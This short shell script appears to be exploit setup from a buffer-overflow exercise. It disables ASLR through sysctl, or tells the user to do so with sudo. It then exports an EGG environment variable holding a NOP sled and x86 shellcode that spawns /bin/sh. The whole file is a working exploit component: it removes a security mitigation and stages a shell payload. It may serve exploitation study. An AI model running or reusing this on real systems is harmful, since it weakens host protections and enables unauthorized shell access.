if grep -q -v 0 /proc/sys/kernel/randomize_va_space; then
    if [ "$EUID" -ne 0 ]; then
        echo "Can't turn off ASLR, need root privs"
        echo "or do it yourself:  sudo sysctl kernel/randomize_va_space=0"
    else
        sysctl kernel/randomize_va_space=0
    fi
fi

if grep -q 0 /proc/sys/kernel/randomize_va_space; then
    export EGG=$(python2 -c 'print("\x90"*10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x90"*10)')
fi

